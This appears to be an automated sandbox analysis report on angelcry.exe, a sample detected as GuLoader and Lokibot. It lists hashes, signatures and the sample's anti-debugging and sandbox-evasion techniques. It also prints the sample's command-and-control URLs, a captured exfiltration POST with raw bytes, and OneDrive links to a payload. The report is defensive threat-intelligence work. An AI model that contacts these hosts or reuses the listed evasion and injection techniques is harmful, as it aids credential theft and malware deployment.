Loading ...

Play interactive tourEdit tour

Analysis Report angelcry.exe

Overview

General Information

Sample Name:angelcry.exe
Analysis ID:288125
MD5:79251e38708be7ed93e899d7ed1ee1ec
SHA1:c8cdd7b5938744f1a73113dc1e3dc0c69423f811
SHA256:3daad337166e027cb177e98f58fc121e0fd6526b0924f4d8e2de00139dee8933
Tags:exe

Most interesting Screenshot:

Detection

GuLoader Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected Lokibot
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Internet Provider seen in connection with other malware
PE file contains strange resources
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • angelcry.exe (PID: 6772 cmdline: 'C:\Users\user\Desktop\angelcry.exe' MD5: 79251E38708BE7ED93E899D7ED1EE1EC)
    • angelcry.exe (PID: 6824 cmdline: 'C:\Users\user\Desktop\angelcry.exe' MD5: 79251E38708BE7ED93E899D7ED1EE1EC)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.233182681.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    Process Memory Space: angelcry.exe PID: 6824JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
      Process Memory Space: angelcry.exe PID: 6824JoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        Process Memory Space: angelcry.exe PID: 6824JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for domain / URLShow sources
          Source: hotelavlokan.comVirustotal: Detection: 10%Perma Link
          Source: http://hotelavlokan.com/Virustotal: Detection: 10%Perma Link
          Source: http://hotelavlokan.com/angel/PL341/index.phpVirustotal: Detection: 6%Perma Link

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.6:49723 -> 104.28.25.76:80
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: POST /angel/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: hotelavlokan.comContent-Length: 111Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 26 66 9c 26 66 9d 26 66 9f 26 66 9c 26 66 97 47 16 8b 30 62 8b 31 11 8b 30 60 ed 26 66 9c 45 70 9d 30 11 8b 30 61 ed Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b&f&f&f&f&f&f&g&f&f&f&f&fG0b10`&fEp00a
          Source: unknownDNS traffic detected: queries for: onedrive.live.com
          Source: unknownHTTP traffic detected: POST /angel/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: hotelavlokan.comContent-Length: 111Cache-Control: no-cacheData Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 26 66 9c 26 66 9d 26 66 9f 26 66 9c 26 66 97 47 16 8b 30 62 8b 31 11 8b 30 60 ed 26 66 9c 45 70 9d 30 11 8b 30 61 ed Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b&f&f&f&f&f&f&g&f&f&f&f&fG0b10`&fEp00a
          Source: angelcry.exe, 00000001.00000002.233408237.000000000097D000.00000004.00000020.sdmpString found in binary or memory: http://crl.microsof/Vo
          Source: angelcry.exe, 00000001.00000002.233408237.000000000097D000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crGW
          Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
          Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmpString found in binary or memory: http://hotelavlokan.com/
          Source: angelcry.exe, 00000001.00000002.233343629.00000000008F7000.00000004.00000020.sdmpString found in binary or memory: http://hotelavlokan.com/angel/PL341/index.php
          Source: angelcry.exe, 00000001.00000003.233068138.000000001E1A0000.00000004.00000001.sdmpString found in binary or memory: http://hotelavlokan.com/angel/PL341/index.phpA
          Source: angelcry.exe, 00000001.00000002.233338537.00000000008F0000.00000004.00000020.sdmpString found in binary or memory: http://hotelavlokan.com/angel/PL341/index.phpP=
          Source: angelcry.exe, 00000001.00000002.233408237.000000000097D000.00000004.00000020.sdmpString found in binary or memory: http://hotelavlokan.com/angel/PL341/index.phpto
          Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmpString found in binary or memory: http://hotelavlokan.com/user
          Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmpString found in binary or memory: http://microsoft.co
          Source: angelcry.exe, 00000001.00000002.233408237.000000000097D000.00000004.00000020.sdmpString found in binary or memory: http://mscrl.mic1V
          Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: angelcry.exe, 00000001.00000002.233343629.00000000008F7000.00000004.00000020.sdmpString found in binary or memory: https://hqdfga.bl.filem/angel/PL341/index.php
          Source: angelcry.exe, 00000001.00000002.233343629.00000000008F7000.00000004.00000020.sdmpString found in binary or memory: https://hqdfga.bl.files.1drv.com/
          Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmp, angelcry.exe, 00000001.00000002.233371911.000000000093A000.00000004.00000020.sdmpString found in binary or memory: https://hqdfga.bl.files.1drv.com/y4m70OQ2Pm11Rsp3_xQ9B2xjRFpfNdr164nvMKkUrZHHUFY5EBAPqZk3cjIqqJ6DjxF
          Source: angelcry.exe, 00000001.00000002.233343629.00000000008F7000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
          Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmp, angelcry.exe, 00000001.00000002.233343629.00000000008F7000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21167&authkey=AM44Jd3
          Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0

          System Summary:

          barindex
          Potential malicious icon foundShow sources
          Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00561A41 NtProtectVirtualMemory,1_2_00561A41
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_0056121F RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory,1_2_0056121F
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00563A3C NtQueryInformationProcess,1_2_00563A3C
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_005636DA NtProtectVirtualMemory,1_2_005636DA
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00561A55 NtProtectVirtualMemory,1_2_00561A55
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00563A42 NtQueryInformationProcess,1_2_00563A42
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00560267 NtSetInformationThread,1_2_00560267
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00563C61 NtQueryInformationProcess,1_2_00563C61
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00563B3D NtQueryInformationProcess,1_2_00563B3D
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_0056123A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,1_2_0056123A
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00561A3A NtProtectVirtualMemory,1_2_00561A3A
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_005611E7 NtProtectVirtualMemory,1_2_005611E7
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00563AE9 NtQueryInformationProcess,1_2_00563AE9
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00563A9C NtQueryInformationProcess,1_2_00563A9C
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00561A8E NtProtectVirtualMemory,1_2_00561A8E
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_005605B7 NtProtectVirtualMemory,1_2_005605B7
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_005602A2 NtSetInformationThread,1_2_005602A2
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_005622DC1_2_005622DC
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00562E661_2_00562E66
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00563B3D1_2_00563B3D
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_0056123A1_2_0056123A
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_0056292B1_2_0056292B
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_005629DB1_2_005629DB
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00563AE91_2_00563AE9
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00563A9C1_2_00563A9C
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00561A8E1_2_00561A8E
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_0056298D1_2_0056298D
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_005633B01_2_005633B0
          Source: angelcry.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: angelcry.exe, 00000000.00000002.210622631.000000000040A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVaagnskabeloner9.exe vs angelcry.exe
          Source: angelcry.exe, 00000000.00000002.210825117.0000000002080000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs angelcry.exe
          Source: angelcry.exe, 00000001.00000002.236632531.000000001DD90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs angelcry.exe
          Source: angelcry.exe, 00000001.00000002.236644678.000000001DEE0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs angelcry.exe
          Source: angelcry.exe, 00000001.00000000.209715398.000000000040A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVaagnskabeloner9.exe vs angelcry.exe
          Source: angelcry.exeBinary or memory string: OriginalFilenameVaagnskabeloner9.exe vs angelcry.exe
          Source: C:\Users\user\Desktop\angelcry.exeSection loaded: crtdll.dllJump to behavior
          Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@3/0@3/1
          Source: C:\Users\user\Desktop\angelcry.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7A741079-23129DC7-5C2F3D4C
          Source: angelcry.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\angelcry.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\angelcry.exe 'C:\Users\user\Desktop\angelcry.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\angelcry.exe 'C:\Users\user\Desktop\angelcry.exe'
          Source: C:\Users\user\Desktop\angelcry.exeProcess created: C:\Users\user\Desktop\angelcry.exe 'C:\Users\user\Desktop\angelcry.exe' Jump to behavior

          Data Obfuscation:

          barindex
          Yara detected GuLoaderShow sources
          Source: Yara matchFile source: 00000001.00000002.233182681.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: angelcry.exe PID: 6824, type: MEMORY
          Yara detected VB6 Downloader GenericShow sources
          Source: Yara matchFile source: Process Memory Space: angelcry.exe PID: 6824, type: MEMORY
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 0_2_004034BC push ss; ret 0_2_004034BD
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 0_2_00402918 push ds; ret 0_2_00402929
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00563120 1_2_00563120
          Tries to detect Any.runShow sources
          Source: C:\Users\user\Desktop\angelcry.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: angelcry.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00563A3C rdtsc 1_2_00563A3C
          Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: angelcry.exe, 00000001.00000002.233343629.00000000008F7000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWHD
          Source: angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
          Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: angelcry.exe, 00000001.00000002.233371911.000000000093A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWthernet0-QoS Packet Scheduler-0000
          Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmpBinary or memory string: vmicvss
          Source: angelcry.exe, 00000001.00000002.233371911.000000000093A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: angelcry.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

          Anti Debugging:

          barindex
          Contains functionality to hide a thread from the debuggerShow sources
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00560267 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00562F10,?,0056317F1_2_00560267
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\angelcry.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00563A3C rdtsc 1_2_00563A3C
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00561D51 InternetOpenA,LdrInitializeThunk,InternetOpenUrlA,1_2_00561D51
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_0056111A mov eax, dword ptr fs:[00000030h]1_2_0056111A
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_0056114E mov eax, dword ptr fs:[00000030h]1_2_0056114E
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00562C00 mov eax, dword ptr fs:[00000030h]1_2_00562C00
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_005633FC mov eax, dword ptr fs:[00000030h]1_2_005633FC
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_005618E8 mov eax, dword ptr fs:[00000030h]1_2_005618E8
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00562EE8 mov eax, dword ptr fs:[00000030h]1_2_00562EE8
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_00560CAC mov eax, dword ptr fs:[00000030h]1_2_00560CAC
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_0056121F RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory,1_2_0056121F
          Source: C:\Users\user\Desktop\angelcry.exeCode function: 1_2_0056123A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,1_2_0056123A
          Source: C:\Users\user\Desktop\angelcry.exeProcess created: C:\Users\user\Desktop\angelcry.exe 'C:\Users\user\Desktop\angelcry.exe' Jump to behavior
          Source: C:\Users\user\Desktop\angelcry.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected LokibotShow sources
          Source: Yara matchFile source: Process Memory Space: angelcry.exe PID: 6824, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected LokibotShow sources
          Source: Yara matchFile source: Process Memory Space: angelcry.exe PID: 6824, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection11Virtualization/Sandbox Evasion21OS Credential DumpingSecurity Software Discovery521Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection11LSASS MemoryVirtualization/Sandbox Evasion21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)DLL Side-Loading1Security Account ManagerSystem Information Discovery12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.